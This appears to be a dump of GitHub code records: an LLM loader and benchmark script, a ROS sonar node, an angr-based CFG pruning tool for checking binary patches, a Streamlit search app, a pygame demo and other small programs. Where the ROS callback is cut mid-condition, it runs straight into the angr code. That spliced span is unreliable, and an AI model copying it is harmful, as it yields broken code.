model_base == \"falcon-1b\":\n checkpoint = \"euclaise/falcon_1b_stage2\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n pipeline = transformers.pipeline(\n \"text-generation\",\n model=checkpoint,\n tokenizer=tokenizer,\n torch_dtype=torch.bfloat16,\n device_map=\"auto\",\n )\n elif model_base == \"ChatGLM\":\n checkpoint = \"THUDM/chatglm2-6b\"\n device = \"cuda\"\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint, trust_remote_code=True)\n model = AutoModel.from_pretrained(checkpoint, trust_remote_code=True).half().cuda()\n \n if torch.cuda.is_available():\n model = model.to(device)\n\n model = model.eval()\n elif model_base == \"gpt2\":\n checkpoint = \"gpt2\"\n device = \"cuda\"\n\n tokenizer = GPT2Tokenizer.from_pretrained(checkpoint)\n model = GPT2LMHeadModel.from_pretrained(checkpoint)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n elif model_base == \"gpt3\" or model_base == \"gpt4\":\n checkpoint = model_base\n elif model_base == \"GPT-J\":\n 
checkpoint = \"EleutherAI/gpt-j-6B\"\n device = \"cuda\"\n\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n model = AutoModelForCausalLM.from_pretrained(checkpoint)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n \n\n model = model.eval()\n elif model_base == \"Mistral\":\n checkpoint = \"mistralai/Mistral-7B-v0.1\"\n device = \"cuda\"\n\n model = AutoModelForCausalLM.from_pretrained(checkpoint)\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n \n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n else:\n checkpoint = \"Deci/DeciLM-6b\"\n device = \"cuda\" # for GPU usage or \"cpu\" for CPU usage\n tokenizer = AutoTokenizer.from_pretrained(checkpoint)\n model = AutoModelForCausalLM.from_pretrained(checkpoint, torch_dtype=torch.bfloat16, trust_remote_code=True).to(device)\n # Explicitly moving model to GPU if available\n if torch.cuda.is_available():\n if torch.cuda.get_device_capability()[0] >= 7:\n model = model.half()\n model = model.to(device)\n\n settings = {\n \"checkpoint\" : checkpoint,\n \"device\" : device,\n \"tokenizer\" : tokenizer,\n \"model\" : model,\n \"pipeline\" : pipeline\n }\n\n return settings\n\ndef generate_response(prompt, model_base = \"Deci\", max_new_tokens=1024, responses=1, api_key=None, settings=None):\n # Check if the prompt is a file path\n if os.path.isfile(prompt):\n with open(prompt, 'r') as file:\n prompt = file.read()\n\n start_time = time.time()\n\n if settings is None:\n settings = setup_model(model_base)\n\n ret_resp = []\n for i in range(responses):\n if i > 0:\n start_time = time.time()\n \n resp = \"\"\n if model_base == \"stabilityai\":\n resp = generate_stabilityai_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"Marx\":\n resp = generate_marx_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"falcon-1b\":\n resp = generate_falcon_1b_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"ChatGLM\":\n # https://huggingface.co/THUDM/chatglm2-6b\n resp = generate_chatglm_6b_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"gpt2\":\n # https://huggingface.co/gpt2\n resp = generate_gpt2_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"gpt3\":\n # https://api.openai.com/v1/chat/completions\n messages = create_openai_message_object(prompt)\n resp = generate_openai_response(messages, model=\"gpt-3.5-turbo\", api_key=api_key)\n elif model_base == \"gpt4\":\n # https://api.openai.com/v1/chat/completions\n messages = create_openai_message_object(prompt)\n resp = generate_openai_response(messages, model=\"gpt-4\", api_key=api_key)\n elif model_base == \"GPT-J\":\n # https://huggingface.co/EleutherAI/gpt-j-6b\n resp = generate_gptj_response(prompt, settings, max_new_tokens=max_new_tokens)\n elif model_base == \"Mistral\":\n # https://huggingface.co/EleutherAI/gpt-j-6b\n resp = generate_mistral_response(prompt, settings, max_new_tokens=max_new_tokens)\n else:\n resp = generate_deci_response(prompt, settings, max_new_tokens=max_new_tokens)\n time_length = time.time() - start_time\n data = {\n \"prompt\" : prompt,\n \"response\" : resp,\n \"model\" : model_base,\n \"time\" : time_length\n }\n ret_resp.append(data)\n\n unload_gpu(settings)\n\n return ret_resp\n\ndef 
TestModels(prompt, max_new_tokens=1024, api_key=None):\n print(\"Testing models...\")\n results =[]\n for model_base in [\"Mistral\",\"gpt2\", \"stabilityai\", \"falcon-1b\", \"Deci\", \"Marx\", \"ChatGLM\"]: # \"GPT-J\", \"gpt3\", \"gpt4\"]:\n print(f\"Testing {model_base}...\")\n start_time = time.time()\n responses = generate_response(prompt, model_base, max_new_tokens=max_new_tokens, responses=2, api_key=api_key)\n time_length = time.time() - start_time\n results.append({\n \"prompt\" : prompt,\n \"responses\" : responses,\n \"model\" : model_base,\n \"time\" : time_length\n })\n print(json.dumps(results[len(results)-1], indent=4))\n \n out_file = \"results.json\"\n\n with open(out_file, 'w') as file:\n file.write(json.dumps(results))\n\ndef loop_generate_response(initial_prompt, model_name=\"Deci\", max_new_tokens=1024, api_key=None):\n\n # Initialize chat history list\n chat_history = []\n \n # Initialize prompt with the starter prompt\n prompt = initial_prompt\n\n settings = setup_model(model_name)\n \n while True:\n # Record start time\n start_time = time.time()\n \n # Generate response using existing `generate_response` function\n response = generate_response(prompt, model_base=model_name, api_key=api_key, settings=settings)\n\n response = response[0][\"response\"]\n\n if prompt in response:\n response = response.replace(prompt, \"\").strip()\n \n # Record end time and calculate elapsed time\n end_time = time.time()\n elapsed_time = end_time - start_time\n \n # Append response and elapsed time to chat history\n chat_entry = {\n \"prompt\": prompt,\n \"response\": response,\n \"elapsed_time\": elapsed_time\n }\n chat_history.append(chat_entry)\n \n # Save chat history to chat.json\n with open(\"chat.json\", \"w\") as json_file:\n json.dump(chat_history, json_file)\n \n # Print the response\n print(f\"Response: {response}\")\n \n # Update the prompt for the next loop\n prompt = response\n\n\n# Example usage\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Generate response using AI model')\n parser.add_argument('prompt', type=str, help='Prompt or file path containing the prompt')\n parser.add_argument('--model', type=str, default=\"Deci\", help='Prompt or file path containing the prompt')\n parser.add_argument('--size', type=int, default=1024, help='Maximum token length for the generated response')\n parser.add_argument('--responses', type=int, default=1, help='Number of responses to generate')\n parser.add_argument('--openai_key', type=str, default=None, help='OpenAI api key.')\n\n args = parser.parse_args()\n\n time_length = 0\n \n TestModels(args.prompt, args.size, args.openai_key)\n # loop_generate_response(args.prompt, model_name=args.model, api_key=args.openai_key, max_new_tokens=args.size)\n\n\"\"\" start_time = time.time()\n responses = generate_response(args.prompt, args.model, max_new_tokens=args.size, responses=args.responses)\n time_length = time.time() - start_time\n response = {\n \"prompt\" : args.prompt,\n \"responses\" : responses,\n \"model\" : time_length,\n \"time\" : time_length\n }\n print(json.dumps(response)) \"\"\"\n","repo_name":"TheCompAce/Phoenix-Horizons","sub_path":"Server/modules/ai/ask_llm.py","file_name":"ask_llm.py","file_ext":"py","file_size_in_byte":19170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17384510949","text":"#!/usr/bin/python3\n\n\"\"\"\nClass of Base\nBase Class\n\"\"\"\n\nimport json\nimport os.path\n\n\nclass Base:\n\n \"\"\"Private class 
attribute\"\"\"\n __nb_objects = 0\n\n \"\"\"__init__ method\"\"\"\n\n def __init__(self, id=None):\n if (id is not None):\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = self.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"method returns JSON string representation of list_dictionaries\"\"\"\n if (list_dictionaries is None or list_dictionaries == ''):\n return \"[]\"\n else:\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"method that writes the JSON string\n representation of list_objs to a file\"\"\"\n filename = cls.__name__ + \".json\"\n with open(filename, 'w') as file:\n if (list_objs is None):\n list_objs = []\n list_dict = []\n for obj in (list_objs):\n list_dict.append(cls.to_dictionary(obj))\n file.write(Base.to_json_string(list_dict))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"method that returns the list of\n the JSON string representation json_string\"\"\"\n if (json_string is None):\n return []\n else:\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"method that returns an instance with all attributes already set\"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n else:\n dummy = cls(1)\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"method that returns a list of instances\"\"\"\n file_name = cls.__name__ + \".json\"\n list_inst = []\n try:\n file = open(file_name, 'r')\n except IOError:\n return list_inst\n ch = cls.from_json_string(file.read())\n for i in (ch):\n list_inst.append(cls.create(**i))\n return (list_inst)\n","repo_name":"weedii/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22522367951","text":"import streamlit as st\nfrom doc_bd import Documents\nfrom motor_de_busqueda import metodo_booleano\n\n\nst.title(\"Sistema de Recuperación de Información\")\n\ncoleccion = st.selectbox(\n \"Elija la coleccion de documentos a utilizar:\", [\"ADI\", \"CISI\"])\n\nif coleccion == \"ADI\":\n df = open(\"Test Collections/adi/adi_data.json\")\n df_pre = open(\"Test Collections/adi/adi_data_prep.json\")\n df_pre_raiz = open(\"Test Collections/adi/adi_data_prep_raiz.json\")\nelse:\n df = open(\"Test Collections/cisi/cisi_data.json\")\n df_pre = open(\"Test Collections/cisi/cisi_data_prep.json\")\n df_pre_raiz = open(\"Test Collections/cisi/cisi_data_prep_raiz.json\")\n\ndocument = Documents(df, df_pre, df_pre_raiz)\n\ncol1, col2, col3, col4 = st.columns(4)\ncol_list = [col1, col2, col3, col4]\n\nst.subheader(\"Términos indexados\")\n\nstr_terms = \"\"\"\"\"\"\ntemp_index = 0\nindex_term = 0\nindex_cols = 0\n\nwith st.expander(\"Ver términos\", expanded=False):\n while index_term < len(document.terms):\n str_terms += str(document.terms[index_term]).ljust(19)\n index_term += 1\n temp_index += 1\n if temp_index == 4:\n str_terms += '\\n'\n temp_index = 0\n st.text(str_terms)\n\nquery = st.text_input(\"Inserte la consulta.\", \"\")\n\nstr_result = \"\"\nif st.button(\"Submit\") and query != \"\":\n doc_ok, term_omitidos, ok = metodo_booleano(document, query)\n st.subheader(\"Output:\")\n\n if not ok:\n st.warning('La consulta esta mal formulada.')\n else:\n if doc_ok:\n str_result += f\"Fueron recuperados {len(doc_ok)} documento\" + (\"s\" if len(doc_ok) 
> 1 else \"\")\n title_doc = {}\n for item in doc_ok:\n title_doc[document.doc_original[item]['titulo']] = item\n st.success(str_result)\n for item in range(len(doc_ok)):\n with st.expander(f'{list(doc_ok)[item]}. ' + list(title_doc.keys())[item].capitalize()):\n info_text = f\"Autor: {document.doc_original[list(doc_ok)[item]]['autor']}\\n\\n {document.doc_original[list(doc_ok)[item]]['texto'].capitalize()}\"\n st.text_area(\" \", info_text, height=150, disabled=True)\n else:\n st.error(\"No se recuperó ningún documento\")\n str_term = ''\n if term_omitidos:\n str_term += f\"Esta consulta contiene los siguientes términos que pueden ser considerados irrelevantes, lo cual puede afectar el resultado de la búsqueda de manera desfavorable \\n\"\n for term in term_omitidos:\n str_term += '- ' + str(term) + \"\\n\"\n st.warning(str_term)\n","repo_name":"Gusta2307/MRI","sub_path":"view_st.py","file_name":"view_st.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2419134525","text":"\"\"\"This file test code for series.py.\"\"\"\nimport pytest\n\n\nFIB_PARAMS = [(2, 1), (3, 2), (4, 3), (5, 5), (6, 8), (7, 13)]\n\n\nLUC_PARAMS = [(2, 3), (3, 4), (4, 7), (5, 11), (6, 18), (7, 29)]\n\n\nSUM_PARAMS = [\n (2, 0, 1, 1),\n (3, 0, 1, 2),\n (4, 0, 1, 3),\n (5, 0, 1, 5),\n (6, 0, 1, 8),\n (7, 0, 1, 13),\n (2, 2, 1, 3),\n (3, 2, 1, 4),\n (4, 2, 1, 7),\n (5, 2, 1, 11),\n (6, 2, 1, 18),\n (7, 2, 1, 29)\n]\n\n\n@pytest.mark.parametrize('n, result', FIB_PARAMS)\ndef test_fibonacci(n, result):\n \"\"\"Test the fibonacci function from the series file.\"\"\"\n from series import fibonacci\n assert fibonacci(n) == result\n\n\n@pytest.mark.parametrize('n, result', LUC_PARAMS)\ndef test_lucas(n, result):\n \"\"\"Test the lucas function from the series file.\"\"\"\n from series import lucas\n assert lucas(n) == result\n\n\n@pytest.mark.parametrize('n, a, b, result', SUM_PARAMS)\ndef test_sum_series(n, a, b, result):\n \"\"\"Test the sum_series function from the series file.\"\"\"\n from series import sum_series\n assert sum_series(n, a, b) == result\n","repo_name":"kavdi/math-series","sub_path":"test_series.py","file_name":"test_series.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27099642319","text":"#!/usr/bin/env python3\n\nimport logging\nimport rospy\nimport numpy as np\n\nfrom sensor_msgs.msg import LaserScan\nfrom std_msgs.msg import Float32MultiArray\nfrom logging_utils import setup_logger, get_logger\n\nclass Sonar2LaserScan:\n def __init__(self):\n self.logger = get_logger(\"Sonar2LaserScan\")\n self.logger.debug(\"Started Sonar2LaserScan init\")\n\n self.pub = [\n rospy.Publisher('/laser_scan0', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan1', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan2', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan3', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan4', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan5', LaserScan, queue_size=10),\n rospy.Publisher('/laser_scan6', LaserScan, queue_size=10)\n ]\n\n self.range_sub = rospy.Subscriber('/sonar_pairs', Float32MultiArray, self.sonar_callback, queue_size=10)\n\n self.msg = LaserScan()\n self.msg.angle_min = -25*np.pi/180\n self.msg.angle_max = 25*np.pi/180\n self.msg.angle_increment = 1*np.pi/180\n self.msg.time_increment = 0\n self.msg.scan_time = 0\n 
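# valid range window (meters) advertised in the emulated LaserScan\n        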
self.msg.range_min = 0.02\n        self.msg.range_max = 2.0\n\n        self.nb_point_per_sonar = int(((self.msg.angle_max-self.msg.angle_min)/self.msg.angle_increment)/2)\n\n\n    def sonar_callback(self, data):\n        id = int(data.data[0])\n        frame_id = 'sonar_f_' + str(id)\n\n        range1 = data.data[1]\n        range2 = data.data[2]\n\n        if range1>=self.msg.range_max:\n            range1 = float(\"inf\")\n        elif range1<self.msg.range_min:\n            range1 = float(\"-inf\")  # branch reconstructed: the '<...>' span was stripped during extraction, assigned value lost; -inf assumed (REP 117 convention)\n\n        if range2>=self.msg.range_max:\n            range2 = float(\"inf\")\n        elif range2 node.addr and node.addr + node.size >= self._check_node.addr:\r\n                self._check_node = node\r\n                self._check_node_addr = node.addr\r\n                break\r\n\r\n        self._remove_unreachable_node()\r\n\r\n    def do_slicing(self):\r\n        slice_target_addrs = []\r\n        patch_addr = self._patch_addr\r\n        check_addr = self._check_node_addr\r\n        angr_function_cfg = self.cfg\r\n        if patch_addr is not None and check_addr is not None:\r\n            addr = self._get_FLAG_instruction(check_addr)\r\n            slice_target_addrs.append(addr)\r\n        else:\r\n\r\n            pre_nodes = angr_function_cfg.predecessors(self._check_node)\r\n            for node in pre_nodes:\r\n                addr = self._get_FLAG_instruction(node.addr)\r\n                slice_target_addrs.append(addr)\r\n        self._slice_target_addrs = slice_target_addrs\r\n        if len(slice_target_addrs) == 0:\r\n            raise Exception(\"target address is empty for slicing\")\r\n        blocks_data_depend = iterate_slice(self._bin, self._func_addr, self._slice_target_addrs, self.asm_cfg)\r\n        self._re_write_edge_weight(blocks_data_depend)\r\n\r\n    def _remove_unreachable_node(self):\r\n        l.debug(\"[*] getting all unreacheable_nodes\")\r\n        unreacheable_nodes = list(self._get_all_unreacheable_blocks(self._check_node_addr))\r\n        to_remove_edges = []\r\n        for node in unreacheable_nodes:\r\n            for node_child in self.cfg[node]:\r\n                to_remove_edges.append((node, node_child))\r\n        for node, node_child in to_remove_edges:\r\n            self.cfg.remove_edge(node, node_child)\r\n\r\n\r\n    def _init_miasm(self):\r\n        fdesc = open(self._bin, 'rb')\r\n        loc_db = LocationDB()\r\n        cont = Container.from_stream(fdesc, loc_db)\r\n        machine = Machine(cont.arch)\r\n        mdis = machine.dis_engine(cont.bin_stream, loc_db=cont.loc_db)\r\n        return mdis\r\n\r\n    def _re_write_edge_weight(self, blocks_to_add_weight, weight_increament=1000):\r\n        '''\r\n        :param self.cfg:\r\n        :param blocks_to_add_weight:\r\n        :return:\r\n        '''\r\n        for node_addr in blocks_to_add_weight:\r\n            block = self._angr_proj.factory.block(node_addr)\r\n            node_in_graph = block.codenode\r\n            l.debug('[*] add weigth to edges to node {}'.format(hex(node_addr)))\r\n            for pred_node in list(self.cfg.predecessors(node_in_graph)):\r\n                self.cfg[pred_node][node_in_graph].update({'weight': weight_increament})\r\n        return self.cfg\r\n\r\n    def get_pruned_cfg(self):\r\n        return self.cfg\r\n\r\n    def get_shortest_paths(self):\r\n        # return nx.dijkstra_path(self.cfg, source=self._function_entry_node, target=self._check_node)\r\n        return nx.all_shortest_paths(self.cfg, source=self._function_entry_node, target=self._check_node, weight='weight')\r\n\r\n    def get_simple_paths(self, cutoff=None):\r\n\r\n        return nx.all_simple_paths(self.cfg, source=self._function_entry_node, target=self._check_node, cutoff=cutoff)\r\n\r\n    def _get_all_unreacheable_blocks(self, check_node_addr):\r\n        '''\r\n\r\n        '''\r\n        cfg = self.cfg\r\n        check_node = self._check_node\r\n        if check_node not in cfg.nodes:\r\n            raise Exception(\"check node in not in cfg.nodes\")\r\n\r\n        reacheable_blocks = []  # record the blocks reaching to patch\r\n        predecessor_queue = [check_node]\r\n        while len(predecessor_queue) > 0:\r\n            current_node = predecessor_queue.pop(0)\r\n\r\n            for parentnode 
in cfg.predecessors(current_node):\r\n if parentnode.addr not in reacheable_blocks:\r\n reacheable_blocks.append(parentnode.addr)\r\n predecessor_queue.append(parentnode)\r\n\r\n for node in cfg.nodes:\r\n if node.addr not in reacheable_blocks:\r\n yield node\r\n\r\n def _get_FLAG_instruction(self, node_addr:int):\r\n '''\r\n :param node:\r\n '''\r\n block = self._mdis.dis_block(node_addr)\r\n if block.lines[-1].name == 'CALL':\r\n try:\r\n next_loc_key = block.get_next()\r\n next_block_addr = self._mdis.loc_db.get_location_offset(next_loc_key)\r\n return self._get_FLAG_instruction(next_block_addr)\r\n except KeyError as e:\r\n l.error(\"[-] block {} has no successor\".format(hex(node_addr)))\r\n return node_addr\r\n\r\n for inst in reversed(block.lines):\r\n if inst.name in self._TARGET_INSTRUCTION:\r\n return inst.offset\r\n else:\r\n return node_addr\r\n\r\n\r\ndef itest_cfgps():\r\n '''\r\n Run for CVE-2018-20671,/home/angr/PatchDiff/binaries/binutils/O0/objdump-2.31.1,/home/angr/PatchDiff/binaries/binutils/O0/objdump-2.32,load_specific_debug_section\r\n 0x804f309 0x804f34b\r\n '''\r\n x='CVE-2018-7568,/home/angr/PatchDiff/binaries/binutils/O0/addr2line-2.30,/home/angr/PatchDiff/binaries/binutils/O0/addr2line-2.31,parse_die'\r\n check_addr = 0x80b421f\r\n patch_addr = 0x80b4250\r\n\r\n\r\n s = x.split(',')\r\n binary_path =s[2]\r\n function_name = s[-1]\r\n p = angr.Project(binary_path,\r\n load_options={'auto_load_libs': False})\r\n\r\n func_addr = p.loader.find_symbol(function_name).rebased_addr\r\n\r\n cfgcache = binary_path+\".angr_cfg\"\r\n if os.path.exists(cfgcache):\r\n cfg = pickle.load(open(cfgcache, 'rb'))\r\n else:\r\n cfg = p.analyses.CFGFast()\r\n function_cfg = cfg.functions[function_name].graph\r\n\r\n cfgps = CFG_PS(binary_path, function_cfg, func_addr, check_addr, patch_addr, p)\r\n for path in cfgps.get_shortest_paths():\r\n addrs = [hex(node.addr) for node in path]\r\n print(\"[>] path: {}\".format(\",\".join(addrs)))\r\n\r\n\r\nif __name__ == '__main__':\r\n itest_cfgps()","repo_name":"shouguoyang/Robin","sub_path":"cfg_pruning_with_slice.py","file_name":"cfg_pruning_with_slice.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35541341139","text":"from PIL import Image, ImageDraw\nfrom PIL import ImageFilter\nimport glob\nimport os\nfrom PIL import ImageColor\nfrom pathlib import Path\nimport random\n\n# Settings\nbackground_size = (1280, 1280)\n\n# Symbols\nsymbol_paths = glob.glob(os.path.join(\"symbols\", \"*.png\"))\nsymbol_paths.sort()\n\n# Background generation\nbg_colors = [\"red\", \"green\", \"blue\", \"gray\", \"yellow\", \"purple\", \"black\"]\n\nfor lol in range(2000):\n background = Image.new(\"RGBA\", background_size, random.choice(bg_colors))\n\n # Drawing colored ellipses\n bg_draw = ImageDraw.Draw(background)\n for i in range(500):\n x = random.randint(-15, background.width)\n y = random.randint(-15, background.height)\n w = random.randint(100, 250)\n l = random.randint(100, 250)\n c = random.choice(bg_colors)\n bg_draw.ellipse((x, y, x+w, y+l), fill=c, outline=None)\n background = background.filter(ImageFilter.MedianFilter(size=9))\n\n # Label generation\n label_width = random.randint(int(background_size[0]*0.2), int(background_size[1]*0.4))\n label_height = random.randint(int(background_size[0]*0.5), int(background_size[1]*0.6))\n label = Image.new(\"RGBA\", (label_width, label_height), \"white\")\n\n # Compose symbols\n num_symbols = 2\n 
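# pick the symbols for this label; random.choices samples with replacement, so the same symbol can repeat\n    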
selected_symbols = random.choices(symbol_paths, k=num_symbols)\n    symbol_boxes = []\n    for i, symbol_path in enumerate(selected_symbols):\n        symbol = Image.open(symbol_path)\n        symbol = symbol.resize((int(label_width/num_symbols), int(label_width/num_symbols)))\n        x = 0 if i == 0 else int(label_width/num_symbols) * i\n        y = 10\n        label.paste(symbol, (x, y), mask=symbol)\n        # Remember the class id and the box in label-local pixels; the annotation is\n        # written once the label has been placed, so the label offset can be applied\n        class_number = symbol_paths.index(symbol_path)\n        symbol_boxes.append((class_number, x, y, symbol.width, symbol.height))\n\n\n    # Paste label into background\n    label_x_pos = random.randint(0, background.width - label.width)\n    label_y_pos = random.randint(0, background.height - label.height)\n    background.paste(label, (label_x_pos, label_y_pos), mask=label)\n    #background.show()\n    print(lol)\n\n    # Writing annotations (YOLO format, normalized to the background and shifted by the label position)\n    annotations = []\n    for class_number, x, y, w, h in symbol_boxes:\n        x_center_normalized = (label_x_pos + x + w / 2) / background.width\n        y_center_normalized = (label_y_pos + y + h / 2) / background.height\n        width_normalized = w / background.width\n        height_normalized = h / background.height\n        annotation = f\"{class_number} {x_center_normalized} {y_center_normalized} {width_normalized} {height_normalized}\"\n        annotations.append(annotation)\n\n    # Save to disk\n    # Creating output folder structure\n    images_folder = os.path.join(\"out\", \"images\")\n    labels_folder = os.path.join(\"out\", \"labels\")\n    Path(images_folder).mkdir(parents=True, exist_ok=True)\n    Path(labels_folder).mkdir(parents=True, exist_ok=True)\n    background = background.convert(\"RGB\")\n    background.save(os.path.join(images_folder, f\"img{lol}.jpg\"))\n    annotation_file = open(os.path.join(labels_folder, f\"img{lol}.txt\"), \"w\")\n    for annotation in annotations:\n        annotation_file.write(annotation + \"\\n\")\n    annotation_file.close()\n","repo_name":"JohannesBauer97/2d-data-generator","sub_path":"src/color-bg-generator/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"8516315365","text":"vowels = ('a', 'e', 'i', 'o', 'u', 'y')\n\nwords = []\n\ncommand = input()\nwhile command != \"End of words\":\n    current_word = command\n    points = 0\n    for char in current_word:\n        points += ord(char)\n\n    if current_word[0].lower() in vowels:\n        points *= len(current_word)\n    else:\n        points = int(points / len(current_word))\n\n    word = {\"word\": current_word, \"points\": points}\n    words.append(word)\n\n    command = input()\n\n# print(words)\nwords.sort(key=lambda w: -w['points'])\nbest_word = words[0]\n\nprint(f\"The most powerful word is {best_word['word']} - {best_word['points']}\")\n","repo_name":"SimeonChifligarov/SoftUni_as_Lecturer","sub_path":"Python_Courses/Python_Basics/Preparation_PB_Exams/01_PB_Exam_6_7_July_2019/06_The_Most_Powerful_Word.py","file_name":"06_The_Most_Powerful_Word.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} {"seq_id":"42969835314","text":"from typing import Dict, List, Optional, Union\n\nfrom .player import Player\nfrom games.common.models.play import Play as BasePlay\n\n\nclass Play(BasePlay):\n    def __init__(self, row: int, col: int, player: Player):\n        self.row = row\n        self.col = col\n        BasePlay.__init__(self, player=player)\n\n    @classmethod\n    def from_database(cls, json_data: Dict[str, Union[int, str]], all_players: List[Player]) -> 'Play':\n        play_player: Optional[Player] = None\n        for player in all_players:\n            if player.name == json_data['player_name']:\n                play_player = player\n                break\n\n        assert play_player is 
not None, f'Could not find player named `{json_data[\"player_name\"]}`'\n\n return Play(row=json_data['row'], col=json_data['col'], player=play_player)\n\n @classmethod\n def from_frontend(cls, json_data: Dict[str, Union[int, str]], all_players: List[Player]) -> 'Play':\n play_player: Optional[Player] = None\n for player in all_players:\n if player.symbol == json_data['symbol']:\n play_player = player\n break\n\n assert play_player is not None, f'Could not find player with symbol `{json_data[\"symbol\"]}`'\n\n return Play(row=json_data['row'], col=json_data['col'], player=play_player)\n\n def to_database(self) -> Dict[str, Union[str, int]]:\n return {\n 'row': self.row,\n 'col': self.col,\n 'player_name': self.player.name\n }\n\n def to_frontend(self) -> Dict[str, Union[str, int]]:\n return {\n 'row': self.row,\n 'col': self.col,\n 'symbol': self.player.symbol\n }\n","repo_name":"PraderioM/GamePlatform","sub_path":"backend/games/tic_tac_toe/models/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17134513109","text":"import os\n\nfrom flask import Blueprint, Flask\nfrom flask_webpack import Webpack\nfrom filters import filters\nfrom sitemap import sitemap_blueprint\n\nbrigade = Blueprint('brigade', __name__)\n\n\ndef create_app():\n app = Flask(__name__, static_folder='build/public/', static_url_path='/assets')\n app.config['SECRET_KEY'] = 'sekrit!'\n\n app.config['WEBPACK_MANIFEST_PATH'] = os.path.abspath('./brigade/build/manifest.json')\n webpack = Webpack()\n webpack.init_app(app)\n\n if 'SERVER_NAME' in os.environ:\n app.config['SERVER_NAME'] = os.environ['SERVER_NAME']\n if 'SITEMAP_URL_SCHEME' in os.environ:\n app.config['SITEMAP_URL_SCHEME'] = os.environ['SITEMAP_URL_SCHEME']\n\n app.register_blueprint(brigade)\n app.register_blueprint(filters)\n app.register_blueprint(sitemap_blueprint)\n return app\n\n\nfrom . 
import views # noqa:E402\n","repo_name":"Vhoakab84/brigade","sub_path":"brigade/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} {"seq_id":"23676630809","text":"#!/usr/bin/env python3\n\nimport pygame\n\n# Movement Keys\nUP = pygame.K_w\nDOWN = pygame.K_s\nLEFT = pygame.K_a\nRIGHT = pygame.K_d\n\n# RGB values\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Screen Dimensions\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)\n\n# Set screen\nscreen = pygame.display.set_mode(SCREEN_SIZE)\npygame.display.set_caption('SpacEnemy')\n\n\n# Background\nbackground = pygame.image.load('images/background.jpg')\nbackground_height = background.get_rect().height\n\n# Player\nplayerSprite = pygame.image.load('images/spaceship_normal.png')\nplayer_x = int(SCREEN_WIDTH / 2) - 30\nplayer_y = int(600 / 1.25)\n\n# Start the game\npygame.init()\n\ndef player(x, y):\n    # Draw the background, then the player sprite at the requested position\n    screen.blit(background, (0, 0))\n    screen.blit(playerSprite, (x, y))\n\n\n\nrunning = True\nwhile running:\n    screen.fill(BLACK)\n    #player_y -= 1\n    #player_x -= 1\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n\n        # Player movement\n        if event.type == pygame.KEYDOWN:\n            if event.key == UP:\n                player_y -= 6\n            if event.key == DOWN:\n                player_y += 6\n            if event.key == LEFT:\n                player_x -= 6\n            if event.key == RIGHT:\n                player_x += 6\n\n    player(player_x, player_y)\n    pygame.display.update()\n\n","repo_name":"emanuel2718/Hitchhiking-the-galaxy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"9919384351","text":"#!/usr/bin/env python\n\nimport itertools\nimport numpy as np\n\ndef calc1(data):\n    a = np.array([list(line) for line in data.split()])\n    coords = np.argwhere(a.T == '#')\n    # print('coords', coords)\n\n    counts = np.zeros(coords.shape[0], int)\n    for i in 